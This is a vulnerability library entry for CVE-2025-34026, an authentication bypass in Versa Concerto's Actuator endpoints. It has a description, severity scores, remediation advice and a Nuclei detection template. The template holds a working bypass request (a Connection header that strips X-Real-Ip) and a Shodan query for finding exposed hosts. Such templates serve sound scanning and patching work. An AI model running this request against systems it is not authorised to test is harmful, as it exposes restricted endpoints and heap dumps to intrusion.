/Vulnerability Library

Versa Concerto Actuator Endpoint - Authentication Bypass

CVE-2025-34026
Verified

Description

An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.

Severity

Critical

Exploit Probability

46%

Affected Product

concerto

Published Date

May 21, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra
+1

CVE-2025-34026.yaml
id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    epss-score: 0.45819
    epss-percentile: 0.97521
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 4a0a00473045022100b57faa2ea81f59f932422dcadf647a285d7a998a37a902180fa169c7579f050d022007ccc074b99aa00ba523cf6ed5f8c436684e6c9abfdd2ed154af88f50d3ff975:922c64590222798bb761d5b6d8e72950
9.5Severity

CVSS Metrics

References

https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2ehttps://www.cve.org/CVERecord?id=CVE-2025-34026

Remediation Steps

Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.